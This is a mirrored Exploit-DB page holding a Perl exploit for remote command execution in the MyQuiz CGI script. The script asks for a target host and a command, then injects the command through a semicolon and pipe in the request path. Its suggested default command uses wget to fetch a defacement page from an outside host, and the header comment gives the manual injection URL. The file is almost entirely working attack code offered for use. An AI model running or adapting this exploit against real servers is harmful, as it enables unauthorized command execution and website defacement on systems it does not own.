bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/webapps/1471.pl
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
1.3 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl
# => MyQuiz Remote Command Execution Exploit
# -> By Hessam-x / www.hackerz.ir
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|
# SecurityFocus [bug] : http://www.securityfocus.com/archive/1/423921/30/0/threaded
# / | \_____ ____ | | __ ___________________
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ /
#\ Y // __ \\ \___| <\ ___/| | \// /
# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \
# \/ \/ \/ \/ \/ \/
# Iran Hackerz Security Team
# Hessam-x : www.hessamx.net
use LWP::Simple;
print "-------------------------------------------\n";
print "= MyQuiz Remote Command Execution Exploit =\n";
print "= By Hessam-x - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";
print "Target(www.example.com)\> ";
chomp($targ = <STDIN>);
print "path: (/cgi-bin/myquiz.pl/ask/)\>";
chomp($path=<STDIN>);
print "command: (wget www.hackerz.ir/deface.htm)\>";
chomp($comd=<STDIN>);
$page=get("http://".$targ.$path) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request,wait....\n";
get("http://".$targ.$path.";".$comd."|")
print "[+] Exploiting request done!\n";
print "Enjoy !";
# milw0rm.com [2006-02-06]
Reference in a new issue View git blame Copy permalink